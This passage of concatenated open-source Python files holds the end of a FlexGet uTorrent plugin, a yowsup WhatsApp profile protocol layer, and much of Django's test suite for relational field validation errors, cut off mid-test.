path = ''
if task.options.test:
log.info('Would add `%s` to utorrent' % entry['title'])
continue
# Add torrent
data = {'action': 'add-url', 's': entry['url'], 'token': token, 'download_dir': folder, 'path': path}
result = session.get(url, params=data, auth=auth)
if 'build' in result.json():
log.info('Added `%s` to utorrent' % entry['url'])
log.info('in folder %s ' % folder + path)
else:
entry.fail('Fail to add `%s` to utorrent' % entry['url'])
@event('plugin.register')
def register_plugin():
plugin.register(PluginUtorrent, 'utorrent', api_ver=2)
| mit |
saisrisathya/whatsapps | build/lib/yowsup/layers/protocol_profiles/layer.py | 31 | 2304 | from yowsup.layers import YowProtocolLayer
from .protocolentities import *
from yowsup.layers.protocol_iq.protocolentities import ErrorIqProtocolEntity, ResultIqProtocolEntity
class YowProfilesProtocolLayer(YowProtocolLayer):
def __init__(self):
handleMap = {
"iq": (self.recvIq, self.sendIq)
}
super(YowProfilesProtocolLayer, self).__init__(handleMap)
def __str__(self):
return "Profiles Layer"
def sendIq(self, entity):
if entity.getXmlns() == "w:profile:picture":
if entity.getType() == "get":
self._sendIq(entity, self.onGetPictureResult, self.onGetPictureError)
elif entity.getType() == "set":
self._sendIq(entity, self.onSetPictureResult, self.onSetPictureError)
elif entity.getType() == "delete":
self._sendIq(entity, self.onDeletePictureResult, self.onDeletePictureError)
elif entity.getXmlns() == "status":
self._sendIq(entity, self.onSetStatusResult, self.onSetStatusError)
def recvIq(self, node):
pass
def onSetStatusResult(self, resultNode, originIqRequestEntity):
self.toUpper(ResultIqProtocolEntity.fromProtocolTreeNode(resultNode))
def onSetStatusError(self, errorNode, originalIqRequestEntity):
self.toUpper(ErrorIqProtocolEntity.fromProtocolTreeNode(errorNode))
def onGetPictureResult(self, resultNode, originalIqRequestEntity):
self.toUpper(ResultGetPictureIqProtocolEntity.fromProtocolTreeNode(resultNode))
def onGetPictureError(self, errorNode, originalIqRequestEntity):
self.toUpper(ErrorIqProtocolEntity.fromProtocolTreeNode(errorNode))
def onSetPictureResult(self, resultNode, originalIqRequestEntity):
self.toUpper(ResultGetPictureIqProtocolEntity.fromProtocolTreeNode(resultNode))
def onSetPictureError(self, errorNode, originalIqRequestEntity):
self.toUpper(ErrorIqProtocolEntity.fromProtocolTreeNode(errorNode))
def onDeletePictureResult(self, resultNode, originalIqRequestEntity):
self.toUpper(ResultIqProtocolEntity.fromProtocolTreeNode(resultNode))
def onDeletePictureError(self, errorNode, originalIqRequestEntity):
self.toUpper(ErrorIqProtocolEntity.fromProtocolTreeNode(errorNode))
| gpl-3.0 |
mjtamlyn/django | tests/invalid_models_tests/test_relative_fields.py | 18 | 60736 | from django.core.checks import Error, Warning as DjangoWarning
from django.db import models
from django.db.models.fields.related import ForeignObject
from django.test.testcases import SimpleTestCase, skipIfDBFeature
from django.test.utils import isolate_apps, override_settings
@isolate_apps('invalid_models_tests')
class RelativeFieldTests(SimpleTestCase):
def test_valid_foreign_key_without_accessor(self):
class Target(models.Model):
# There would be a clash if Model.field installed an accessor.
model = models.IntegerField()
class Model(models.Model):
field = models.ForeignKey(Target, models.CASCADE, related_name='+')
field = Model._meta.get_field('field')
errors = field.check()
self.assertEqual(errors, [])
def test_foreign_key_to_missing_model(self):
# Model names are resolved when a model is being created, so we cannot
# test relative fields in isolation and we need to attach them to a
# model.
class Model(models.Model):
foreign_key = models.ForeignKey('Rel1', models.CASCADE)
field = Model._meta.get_field('foreign_key')
errors = field.check()
expected = [
Error(
"Field defines a relation with model 'Rel1', "
"which is either not installed, or is abstract.",
obj=field,
id='fields.E300',
),
]
self.assertEqual(errors, expected)
@isolate_apps('invalid_models_tests')
def test_foreign_key_to_isolate_apps_model(self):
"""
#25723 - Referenced model registration lookup should be run against the
field's model registry.
"""
class OtherModel(models.Model):
pass
class Model(models.Model):
foreign_key = models.ForeignKey('OtherModel', models.CASCADE)
field = Model._meta.get_field('foreign_key')
self.assertEqual(field.check(from_model=Model), [])
def test_many_to_many_to_missing_model(self):
class Model(models.Model):
m2m = models.ManyToManyField("Rel2")
field = Model._meta.get_field('m2m')
errors = field.check(from_model=Model)
expected = [
Error(
"Field defines a relation with model 'Rel2', "
"which is either not installed, or is abstract.",
obj=field,
id='fields.E300',
),
]
self.assertEqual(errors, expected)
@isolate_apps('invalid_models_tests')
def test_many_to_many_to_isolate_apps_model(self):
"""
#25723 - Referenced model registration lookup should be run against the
field's model registry.
"""
class OtherModel(models.Model):
pass
class Model(models.Model):
m2m = models.ManyToManyField('OtherModel')
field = Model._meta.get_field('m2m')
self.assertEqual(field.check(from_model=Model), [])
def test_many_to_many_with_limit_choices_auto_created_no_warning(self):
class Model(models.Model):
name = models.CharField(max_length=20)
class ModelM2M(models.Model):
m2m = models.ManyToManyField(Model, limit_choices_to={'name': 'test_name'})
self.assertEqual(ModelM2M.check(), [])
def test_many_to_many_with_useless_options(self):
class Model(models.Model):
name = models.CharField(max_length=20)
class ModelM2M(models.Model):
m2m = models.ManyToManyField(
Model,
null=True,
validators=[lambda x: x],
limit_choices_to={'name': 'test_name'},
through='ThroughModel',
through_fields=('modelm2m', 'model'),
)
class ThroughModel(models.Model):
model = models.ForeignKey('Model', models.CASCADE)
modelm2m = models.ForeignKey('ModelM2M', models.CASCADE)
errors = ModelM2M.check()
field = ModelM2M._meta.get_field('m2m')
expected = [
DjangoWarning(
'null has no effect on ManyToManyField.',
obj=field,
id='fields.W340',
),
DjangoWarning(
'ManyToManyField does not support validators.',
obj=field,
id='fields.W341',
),
DjangoWarning(
'limit_choices_to has no effect on ManyToManyField '
'with a through model.',
obj=field,
id='fields.W343',
),
]
self.assertEqual(errors, expected)
def test_ambiguous_relationship_model(self):
class Person(models.Model):
pass
class Group(models.Model):
field = models.ManyToManyField('Person', through="AmbiguousRelationship", related_name='tertiary')
class AmbiguousRelationship(models.Model):
            # Too many foreign keys to Person.
first_person = models.ForeignKey(Person, models.CASCADE, related_name="first")
second_person = models.ForeignKey(Person, models.CASCADE, related_name="second")
second_model = models.ForeignKey(Group, models.CASCADE)
field = Group._meta.get_field('field')
errors = field.check(from_model=Group)
expected = [
Error(
"The model is used as an intermediate model by "
"'invalid_models_tests.Group.field', but it has more than one "
"foreign key to 'Person', which is ambiguous. You must specify "
"which foreign key Django should use via the through_fields "
"keyword argument.",
hint=(
'If you want to create a recursive relationship, use '
'ForeignKey("self", symmetrical=False, through="AmbiguousRelationship").'
),
obj=field,
id='fields.E335',
),
]
self.assertEqual(errors, expected)
def test_relationship_model_with_foreign_key_to_wrong_model(self):
class WrongModel(models.Model):
pass
class Person(models.Model):
pass
class Group(models.Model):
members = models.ManyToManyField('Person', through="InvalidRelationship")
class InvalidRelationship(models.Model):
person = models.ForeignKey(Person, models.CASCADE)
wrong_foreign_key = models.ForeignKey(WrongModel, models.CASCADE)
# The last foreign key should point to Group model.
field = Group._meta.get_field('members')
errors = field.check(from_model=Group)
expected = [
Error(
"The model is used as an intermediate model by "
"'invalid_models_tests.Group.members', but it does not "
"have a foreign key to 'Group' or 'Person'.",
obj=InvalidRelationship,
id='fields.E336',
),
]
self.assertEqual(errors, expected)
def test_relationship_model_missing_foreign_key(self):
class Person(models.Model):
pass
class Group(models.Model):
members = models.ManyToManyField('Person', through="InvalidRelationship")
class InvalidRelationship(models.Model):
group = models.ForeignKey(Group, models.CASCADE)
# No foreign key to Person
field = Group._meta.get_field('members')
errors = field.check(from_model=Group)
expected = [
Error(
"The model is used as an intermediate model by "
"'invalid_models_tests.Group.members', but it does not have "
"a foreign key to 'Group' or 'Person'.",
obj=InvalidRelationship,
id='fields.E336',
),
]
self.assertEqual(errors, expected)
def test_missing_relationship_model(self):
class Person(models.Model):
pass
class Group(models.Model):
members = models.ManyToManyField('Person', through="MissingM2MModel")
field = Group._meta.get_field('members')
errors = field.check(from_model=Group)
expected = [
Error(
"Field specifies a many-to-many relation through model "
"'MissingM2MModel', which has not been installed.",
obj=field,
id='fields.E331',
),
]
self.assertEqual(errors, expected)
def test_missing_relationship_model_on_model_check(self):
class Person(models.Model):
pass
class Group(models.Model):
members = models.ManyToManyField('Person', through='MissingM2MModel')
self.assertEqual(Group.check(), [
Error(
"Field specifies a many-to-many relation through model "
"'MissingM2MModel', which has not been installed.",
obj=Group._meta.get_field('members'),
id='fields.E331',
),
])
@isolate_apps('invalid_models_tests')
def test_many_to_many_through_isolate_apps_model(self):
"""
#25723 - Through model registration lookup should be run against the
field's model registry.
"""
class GroupMember(models.Model):
person = models.ForeignKey('Person', models.CASCADE)
group = models.ForeignKey('Group', models.CASCADE)
class Person(models.Model):
pass
class Group(models.Model):
members = models.ManyToManyField('Person', through='GroupMember')
field = Group._meta.get_field('members')
self.assertEqual(field.check(from_model=Group), [])
def test_symmetrical_self_referential_field(self):
class Person(models.Model):
# Implicit symmetrical=False.
friends = models.ManyToManyField('self', through="Relationship")
class Relationship(models.Model):
first = models.ForeignKey(Person, models.CASCADE, related_name="rel_from_set")
second = models.ForeignKey(Person, models.CASCADE, related_name="rel_to_set")
field = Person._meta.get_field('friends')
errors = field.check(from_model=Person)
expected = [
Error(
'Many-to-many fields with intermediate tables must not be symmetrical.',
obj=field,
id='fields.E332',
),
]
self.assertEqual(errors, expected)
def test_too_many_foreign_keys_in_self_referential_model(self):
class Person(models.Model):
friends = models.ManyToManyField('self', through="InvalidRelationship", symmetrical=False)
class InvalidRelationship(models.Model):
first = models.ForeignKey(Person, models.CASCADE, related_name="rel_from_set_2")
second = models.ForeignKey(Person, models.CASCADE, related_name="rel_to_set_2")
third = models.ForeignKey(Person, models.CASCADE, related_name="too_many_by_far")
field = Person._meta.get_field('friends')
errors = field.check(from_model=Person)
expected = [
Error(
"The model is used as an intermediate model by "
"'invalid_models_tests.Person.friends', but it has more than two "
"foreign keys to 'Person', which is ambiguous. You must specify "
"which two foreign keys Django should use via the through_fields "
"keyword argument.",
hint='Use through_fields to specify which two foreign keys Django should use.',
obj=InvalidRelationship,
id='fields.E333',
),
]
self.assertEqual(errors, expected)
def test_symmetric_self_reference_with_intermediate_table(self):
class Person(models.Model):
# Explicit symmetrical=True.
friends = models.ManyToManyField('self', through="Relationship", symmetrical=True)
class Relationship(models.Model):
first = models.ForeignKey(Person, models.CASCADE, related_name="rel_from_set")
second = models.ForeignKey(Person, models.CASCADE, related_name="rel_to_set")
field = Person._meta.get_field('friends')
errors = field.check(from_model=Person)
expected = [
Error(
'Many-to-many fields with intermediate tables must not be symmetrical.',
obj=field,
id='fields.E332',
),
]
self.assertEqual(errors, expected)
def test_symmetric_self_reference_with_intermediate_table_and_through_fields(self):
"""
Using through_fields in a m2m with an intermediate model shouldn't
mask its incompatibility with symmetry.
"""
class Person(models.Model):
# Explicit symmetrical=True.
friends = models.ManyToManyField(
'self',
symmetrical=True,
through="Relationship",
through_fields=('first', 'second'),
)
class Relationship(models.Model):
first = models.ForeignKey(Person, models.CASCADE, related_name="rel_from_set")
second = models.ForeignKey(Person, models.CASCADE, related_name="rel_to_set")
referee = models.ForeignKey(Person, models.CASCADE, related_name="referred")
field = Person._meta.get_field('friends')
errors = field.check(from_model=Person)
expected = [
Error(
'Many-to-many fields with intermediate tables must not be symmetrical.',
obj=field,
id='fields.E332',
),
]
self.assertEqual(errors, expected)
def test_foreign_key_to_abstract_model(self):
class AbstractModel(models.Model):
class Meta:
abstract = True
class Model(models.Model):
rel_string_foreign_key = models.ForeignKey('AbstractModel', models.CASCADE)
rel_class_foreign_key = models.ForeignKey(AbstractModel, models.CASCADE)
fields = [
Model._meta.get_field('rel_string_foreign_key'),
Model._meta.get_field('rel_class_foreign_key'),
]
expected_error = Error(
"Field defines a relation with model 'AbstractModel', "
"which is either not installed, or is abstract.",
id='fields.E300',
)
for field in fields:
expected_error.obj = field
errors = field.check()
self.assertEqual(errors, [expected_error])
def test_m2m_to_abstract_model(self):
class AbstractModel(models.Model):
class Meta:
abstract = True
class Model(models.Model):
rel_string_m2m = models.ManyToManyField('AbstractModel')
rel_class_m2m = models.ManyToManyField(AbstractModel)
fields = [
Model._meta.get_field('rel_string_m2m'),
Model._meta.get_field('rel_class_m2m'),
]
expected_error = Error(
"Field defines a relation with model 'AbstractModel', "
"which is either not installed, or is abstract.",
id='fields.E300',
)
for field in fields:
expected_error.obj = field
errors = field.check(from_model=Model)
self.assertEqual(errors, [expected_error])
def test_unique_m2m(self):
class Person(models.Model):
name = models.CharField(max_length=5)
class Group(models.Model):
members = models.ManyToManyField('Person', unique=True)
field = Group._meta.get_field('members')
errors = field.check(from_model=Group)
expected = [
Error(
'ManyToManyFields cannot be unique.',
obj=field,
id='fields.E330',
),
]
self.assertEqual(errors, expected)
def test_foreign_key_to_non_unique_field(self):
class Target(models.Model):
bad = models.IntegerField() # No unique=True
class Model(models.Model):
foreign_key = models.ForeignKey('Target', models.CASCADE, to_field='bad')
field = Model._meta.get_field('foreign_key')
errors = field.check()
expected = [
Error(
"'Target.bad' must set unique=True because it is referenced by a foreign key.",
obj=field,
id='fields.E311',
),
]
self.assertEqual(errors, expected)
def test_foreign_key_to_non_unique_field_under_explicit_model(self):
class Target(models.Model):
bad = models.IntegerField()
class Model(models.Model):
field = models.ForeignKey(Target, models.CASCADE, to_field='bad')
field = Model._meta.get_field('field')
errors = field.check()
expected = [
Error(
"'Target.bad' must set unique=True because it is referenced by a foreign key.",
obj=field,
id='fields.E311',
),
]
self.assertEqual(errors, expected)
def test_foreign_object_to_non_unique_fields(self):
class Person(models.Model):
# Note that both fields are not unique.
country_id = models.IntegerField()
city_id = models.IntegerField()
class MMembership(models.Model):
person_country_id = models.IntegerField()
person_city_id = models.IntegerField()
person = models.ForeignObject(
Person,
on_delete=models.CASCADE,
from_fields=['person_country_id', 'person_city_id'],
to_fields=['country_id', 'city_id'],
)
field = MMembership._meta.get_field('person')
errors = field.check()
expected = [
Error(
"No subset of the fields 'country_id', 'city_id' on model 'Person' is unique.",
hint=(
"Add unique=True on any of those fields or add at least "
"a subset of them to a unique_together constraint."
),
obj=field,
id='fields.E310',
)
]
self.assertEqual(errors, expected)
def test_on_delete_set_null_on_non_nullable_field(self):
class Person(models.Model):
pass
class Model(models.Model):
foreign_key = models.ForeignKey('Person', models.SET_NULL)
field = Model._meta.get_field('foreign_key')
errors = field.check()
expected = [
Error(
'Field specifies on_delete=SET_NULL, but cannot be null.',
hint='Set null=True argument on the field, or change the on_delete rule.',
obj=field,
id='fields.E320',
),
]
self.assertEqual(errors, expected)
def test_on_delete_set_default_without_default_value(self):
class Person(models.Model):
pass
class Model(models.Model):
foreign_key = models.ForeignKey('Person', models.SET_DEFAULT)
field = Model._meta.get_field('foreign_key')
errors = field.check()
expected = [
Error(
'Field specifies on_delete=SET_DEFAULT, but has no default value.',
hint='Set a default value, or change the on_delete rule.',
obj=field,
id='fields.E321',
),
]
self.assertEqual(errors, expected)
@skipIfDBFeature('interprets_empty_strings_as_nulls')
def test_nullable_primary_key(self):
class Model(models.Model):
field = models.IntegerField(primary_key=True, null=True)
field = Model._meta.get_field('field')
errors = field.check()
expected = [
Error(
'Primary keys must not have null=True.',
hint='Set null=False on the field, or remove primary_key=True argument.',
obj=field,
id='fields.E007',
),
]
self.assertEqual(errors, expected)
def test_not_swapped_model(self):
class SwappableModel(models.Model):
# A model that can be, but isn't swapped out. References to this
# model should *not* raise any validation error.
class Meta:
swappable = 'TEST_SWAPPABLE_MODEL'
class Model(models.Model):
explicit_fk = models.ForeignKey(
SwappableModel,
models.CASCADE,
related_name='explicit_fk',
)
implicit_fk = models.ForeignKey(
'invalid_models_tests.SwappableModel',
models.CASCADE,
related_name='implicit_fk',
)
explicit_m2m = models.ManyToManyField(SwappableModel, related_name='explicit_m2m')
implicit_m2m = models.ManyToManyField(
'invalid_models_tests.SwappableModel',
related_name='implicit_m2m',
)
explicit_fk = Model._meta.get_field('explicit_fk')
self.assertEqual(explicit_fk.check(), [])
implicit_fk = Model._meta.get_field('implicit_fk')
self.assertEqual(implicit_fk.check(), [])
explicit_m2m = Model._meta.get_field('explicit_m2m')
self.assertEqual(explicit_m2m.check(from_model=Model), [])
implicit_m2m = Model._meta.get_field('implicit_m2m')
self.assertEqual(implicit_m2m.check(from_model=Model), [])
@override_settings(TEST_SWAPPED_MODEL='invalid_models_tests.Replacement')
def test_referencing_to_swapped_model(self):
class Replacement(models.Model):
pass
class SwappedModel(models.Model):
class Meta:
swappable = 'TEST_SWAPPED_MODEL'
class Model(models.Model):
explicit_fk = models.ForeignKey(
SwappedModel,
models.CASCADE,
related_name='explicit_fk',
)
implicit_fk = models.ForeignKey(
'invalid_models_tests.SwappedModel',
models.CASCADE,
related_name='implicit_fk',
)
explicit_m2m = models.ManyToManyField(SwappedModel, related_name='explicit_m2m')
implicit_m2m = models.ManyToManyField(
'invalid_models_tests.SwappedModel',
related_name='implicit_m2m',
)
fields = [
Model._meta.get_field('explicit_fk'),
Model._meta.get_field('implicit_fk'),
Model._meta.get_field('explicit_m2m'),
Model._meta.get_field('implicit_m2m'),
]
expected_error = Error(
("Field defines a relation with the model "
"'invalid_models_tests.SwappedModel', which has been swapped out."),
hint="Update the relation to point at 'settings.TEST_SWAPPED_MODEL'.",
id='fields.E301',
)
for field in fields:
expected_error.obj = field
errors = field.check(from_model=Model)
self.assertEqual(errors, [expected_error])
def test_related_field_has_invalid_related_name(self):
digit = 0
illegal_non_alphanumeric = '!'
whitespace = '\t'
invalid_related_names = [
'%s_begins_with_digit' % digit,
'%s_begins_with_illegal_non_alphanumeric' % illegal_non_alphanumeric,
'%s_begins_with_whitespace' % whitespace,
'contains_%s_illegal_non_alphanumeric' % illegal_non_alphanumeric,
'contains_%s_whitespace' % whitespace,
'ends_with_with_illegal_non_alphanumeric_%s' % illegal_non_alphanumeric,
'ends_with_whitespace_%s' % whitespace,
'with', # a Python keyword
'related_name\n',
'',
',', # non-ASCII
]
class Parent(models.Model):
pass
for invalid_related_name in invalid_related_names:
Child = type('Child%s' % invalid_related_name, (models.Model,), {
'parent': models.ForeignKey('Parent', models.CASCADE, related_name=invalid_related_name),
'__module__': Parent.__module__,
})
field = Child._meta.get_field('parent')
errors = Child.check()
expected = [
Error(
"The name '%s' is invalid related_name for field Child%s.parent"
% (invalid_related_name, invalid_related_name),
hint="Related name must be a valid Python identifier or end with a '+'",
obj=field,
id='fields.E306',
),
]
self.assertEqual(errors, expected)
def test_related_field_has_valid_related_name(self):
lowercase = 'a'
uppercase = 'A'
digit = 0
related_names = [
'%s_starts_with_lowercase' % lowercase,
            '%s_starts_with_uppercase' % uppercase,
'_starts_with_underscore',
'contains_%s_digit' % digit,
'ends_with_plus+',
'_+',
'+',
'試',
'試驗+',
]
class Parent(models.Model):
pass
for related_name in related_names:
Child = type('Child%s' % related_name, (models.Model,), {
'parent': models.ForeignKey('Parent', models.CASCADE, related_name=related_name),
'__module__': Parent.__module__,
})
errors = Child.check()
self.assertFalse(errors)
def test_to_fields_exist(self):
class Parent(models.Model):
pass
class Child(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
parent = ForeignObject(
Parent,
on_delete=models.SET_NULL,
from_fields=('a', 'b'),
to_fields=('a', 'b'),
)
field = Child._meta.get_field('parent')
expected = [
Error(
"The to_field 'a' doesn't exist on the related model 'invalid_models_tests.Parent'.",
obj=field,
id='fields.E312',
),
Error(
"The to_field 'b' doesn't exist on the related model 'invalid_models_tests.Parent'.",
obj=field,
id='fields.E312',
),
]
self.assertEqual(field.check(), expected)
def test_to_fields_not_checked_if_related_model_doesnt_exist(self):
class Child(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
parent = ForeignObject(
'invalid_models_tests.Parent',
on_delete=models.SET_NULL,
from_fields=('a', 'b'),
to_fields=('a', 'b'),
)
field = Child._meta.get_field('parent')
self.assertEqual(field.check(), [
Error(
"Field defines a relation with model 'invalid_models_tests.Parent', "
"which is either not installed, or is abstract.",
id='fields.E300',
obj=field,
),
])
def test_invalid_related_query_name(self):
class Target(models.Model):
pass
class Model(models.Model):
first = models.ForeignKey(Target, models.CASCADE, related_name='contains__double')
second = models.ForeignKey(Target, models.CASCADE, related_query_name='ends_underscore_')
self.assertEqual(Model.check(), [
Error(
"Reverse query name 'contains__double' must not contain '__'.",
hint=("Add or change a related_name or related_query_name "
"argument for this field."),
obj=Model._meta.get_field('first'),
id='fields.E309',
),
Error(
"Reverse query name 'ends_underscore_' must not end with an "
"underscore.",
hint=("Add or change a related_name or related_query_name "
"argument for this field."),
obj=Model._meta.get_field('second'),
id='fields.E308',
),
])
@isolate_apps('invalid_models_tests')
class AccessorClashTests(SimpleTestCase):
def test_fk_to_integer(self):
self._test_accessor_clash(
target=models.IntegerField(),
relative=models.ForeignKey('Target', models.CASCADE))
def test_fk_to_fk(self):
self._test_accessor_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ForeignKey('Target', models.CASCADE))
def test_fk_to_m2m(self):
self._test_accessor_clash(
target=models.ManyToManyField('Another'),
relative=models.ForeignKey('Target', models.CASCADE))
def test_m2m_to_integer(self):
self._test_accessor_clash(
target=models.IntegerField(),
relative=models.ManyToManyField('Target'))
def test_m2m_to_fk(self):
self._test_accessor_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ManyToManyField('Target'))
def test_m2m_to_m2m(self):
self._test_accessor_clash(
target=models.ManyToManyField('Another'),
relative=models.ManyToManyField('Target'))
def _test_accessor_clash(self, target, relative):
class Another(models.Model):
pass
class Target(models.Model):
model_set = target
class Model(models.Model):
rel = relative
errors = Model.check()
expected = [
Error(
"Reverse accessor for 'Model.rel' clashes with field name 'Target.model_set'.",
hint=("Rename field 'Target.model_set', or add/change "
"a related_name argument to the definition "
"for field 'Model.rel'."),
obj=Model._meta.get_field('rel'),
id='fields.E302',
),
]
self.assertEqual(errors, expected)
def test_clash_between_accessors(self):
class Target(models.Model):
pass
class Model(models.Model):
foreign = models.ForeignKey(Target, models.CASCADE)
m2m = models.ManyToManyField(Target)
errors = Model.check()
expected = [
Error(
"Reverse accessor for 'Model.foreign' clashes with reverse accessor for 'Model.m2m'.",
hint=(
"Add or change a related_name argument to the definition "
"for 'Model.foreign' or 'Model.m2m'."
),
obj=Model._meta.get_field('foreign'),
id='fields.E304',
),
Error(
"Reverse accessor for 'Model.m2m' clashes with reverse accessor for 'Model.foreign'.",
hint=(
"Add or change a related_name argument to the definition "
"for 'Model.m2m' or 'Model.foreign'."
),
obj=Model._meta.get_field('m2m'),
id='fields.E304',
),
]
self.assertEqual(errors, expected)
def test_m2m_to_m2m_with_inheritance(self):
""" Ref #22047. """
class Target(models.Model):
pass
class Model(models.Model):
children = models.ManyToManyField('Child', related_name="m2m_clash", related_query_name="no_clash")
class Parent(models.Model):
m2m_clash = models.ManyToManyField('Target')
class Child(Parent):
pass
errors = Model.check()
expected = [
Error(
"Reverse accessor for 'Model.children' clashes with field name 'Child.m2m_clash'.",
hint=(
"Rename field 'Child.m2m_clash', or add/change a related_name "
"argument to the definition for field 'Model.children'."
),
obj=Model._meta.get_field('children'),
id='fields.E302',
)
]
self.assertEqual(errors, expected)
def test_no_clash_for_hidden_related_name(self):
class Stub(models.Model):
pass
class ManyToManyRel(models.Model):
thing1 = models.ManyToManyField(Stub, related_name='+')
thing2 = models.ManyToManyField(Stub, related_name='+')
class FKRel(models.Model):
thing1 = models.ForeignKey(Stub, models.CASCADE, related_name='+')
thing2 = models.ForeignKey(Stub, models.CASCADE, related_name='+')
self.assertEqual(ManyToManyRel.check(), [])
self.assertEqual(FKRel.check(), [])
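# A minimal sketch of the fix suggested by the fields.E302 hints exercised
# above: give the relation an explicit related_name so its reverse accessor no
# longer collides with the target's 'model_set' field. The names are
# hypothetical and mirror the models built in _test_accessor_clash().
#
#     class Target(models.Model):
#         model_set = models.IntegerField()
#
#     class Model(models.Model):
#         rel = models.ForeignKey(Target, models.CASCADE, related_name='related_models')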
@isolate_apps('invalid_models_tests')
class ReverseQueryNameClashTests(SimpleTestCase):
def test_fk_to_integer(self):
self._test_reverse_query_name_clash(
target=models.IntegerField(),
relative=models.ForeignKey('Target', models.CASCADE))
def test_fk_to_fk(self):
self._test_reverse_query_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ForeignKey('Target', models.CASCADE))
def test_fk_to_m2m(self):
self._test_reverse_query_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ForeignKey('Target', models.CASCADE))
def test_m2m_to_integer(self):
self._test_reverse_query_name_clash(
target=models.IntegerField(),
relative=models.ManyToManyField('Target'))
def test_m2m_to_fk(self):
self._test_reverse_query_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ManyToManyField('Target'))
def test_m2m_to_m2m(self):
self._test_reverse_query_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ManyToManyField('Target'))
def _test_reverse_query_name_clash(self, target, relative):
class Another(models.Model):
pass
class Target(models.Model):
model = target
class Model(models.Model):
rel = relative
errors = Model.check()
expected = [
Error(
"Reverse query name for 'Model.rel' clashes with field name 'Target.model'.",
hint=(
"Rename field 'Target.model', or add/change a related_name "
"argument to the definition for field 'Model.rel'."
),
obj=Model._meta.get_field('rel'),
id='fields.E303',
),
]
self.assertEqual(errors, expected)
@isolate_apps('invalid_models_tests')
class ExplicitRelatedNameClashTests(SimpleTestCase):
def test_fk_to_integer(self):
self._test_explicit_related_name_clash(
target=models.IntegerField(),
relative=models.ForeignKey('Target', models.CASCADE, related_name='clash'))
def test_fk_to_fk(self):
self._test_explicit_related_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ForeignKey('Target', models.CASCADE, related_name='clash'))
def test_fk_to_m2m(self):
self._test_explicit_related_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ForeignKey('Target', models.CASCADE, related_name='clash'))
def test_m2m_to_integer(self):
self._test_explicit_related_name_clash(
target=models.IntegerField(),
relative=models.ManyToManyField('Target', related_name='clash'))
def test_m2m_to_fk(self):
self._test_explicit_related_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ManyToManyField('Target', related_name='clash'))
def test_m2m_to_m2m(self):
self._test_explicit_related_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ManyToManyField('Target', related_name='clash'))
def _test_explicit_related_name_clash(self, target, relative):
class Another(models.Model):
pass
class Target(models.Model):
clash = target
class Model(models.Model):
rel = relative
errors = Model.check()
expected = [
Error(
"Reverse accessor for 'Model.rel' clashes with field name 'Target.clash'.",
hint=(
"Rename field 'Target.clash', or add/change a related_name "
"argument to the definition for field 'Model.rel'."
),
obj=Model._meta.get_field('rel'),
id='fields.E302',
),
Error(
"Reverse query name for 'Model.rel' clashes with field name 'Target.clash'.",
hint=(
"Rename field 'Target.clash', or add/change a related_name "
"argument to the definition for field 'Model.rel'."
),
obj=Model._meta.get_field('rel'),
id='fields.E303',
),
]
self.assertEqual(errors, expected)
@isolate_apps('invalid_models_tests')
class ExplicitRelatedQueryNameClashTests(SimpleTestCase):
def test_fk_to_integer(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.IntegerField(),
relative=models.ForeignKey(
'Target',
models.CASCADE,
related_name=related_name,
related_query_name='clash',
)
)
def test_hidden_fk_to_integer(self, related_name=None):
self.test_fk_to_integer(related_name='+')
def test_fk_to_fk(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ForeignKey(
'Target',
models.CASCADE,
related_name=related_name,
related_query_name='clash',
)
)
def test_hidden_fk_to_fk(self):
self.test_fk_to_fk(related_name='+')
def test_fk_to_m2m(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ForeignKey(
'Target',
models.CASCADE,
related_name=related_name,
related_query_name='clash',
)
)
def test_hidden_fk_to_m2m(self):
self.test_fk_to_m2m(related_name='+')
def test_m2m_to_integer(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.IntegerField(),
relative=models.ManyToManyField('Target', related_name=related_name, related_query_name='clash'))
def test_hidden_m2m_to_integer(self):
self.test_m2m_to_integer(related_name='+')
def test_m2m_to_fk(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ManyToManyField('Target', related_name=related_name, related_query_name='clash'))
def test_hidden_m2m_to_fk(self):
self.test_m2m_to_fk(related_name='+')
def test_m2m_to_m2m(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ManyToManyField(
'Target',
related_name=related_name,
related_query_name='clash',
)
)
def test_hidden_m2m_to_m2m(self):
self.test_m2m_to_m2m(related_name='+')
def _test_explicit_related_query_name_clash(self, target, relative):
class Another(models.Model):
pass
class Target(models.Model):
clash = target
class Model(models.Model):
rel = relative
errors = Model.check()
expected = [
Error(
"Reverse query name for 'Model.rel' clashes with field name 'Target.clash'.",
hint=(
"Rename field 'Target.clash', or add/change a related_name "
"argument to the definition for field 'Model.rel'."
),
obj=Model._meta.get_field('rel'),
id='fields.E303',
),
]
self.assertEqual(errors, expected)
@isolate_apps('invalid_models_tests')
class SelfReferentialM2MClashTests(SimpleTestCase):
def test_clash_between_accessors(self):
class Model(models.Model):
first_m2m = models.ManyToManyField('self', symmetrical=False)
second_m2m = models.ManyToManyField('self', symmetrical=False)
errors = Model.check()
expected = [
Error(
"Reverse accessor for 'Model.first_m2m' clashes with reverse accessor for 'Model.second_m2m'.",
hint=(
"Add or change a related_name argument to the definition "
"for 'Model.first_m2m' or 'Model.second_m2m'."
),
obj=Model._meta.get_field('first_m2m'),
id='fields.E304',
),
Error(
"Reverse accessor for 'Model.second_m2m' clashes with reverse accessor for 'Model.first_m2m'.",
hint=(
"Add or change a related_name argument to the definition "
"for 'Model.second_m2m' or 'Model.first_m2m'."
),
obj=Model._meta.get_field('second_m2m'),
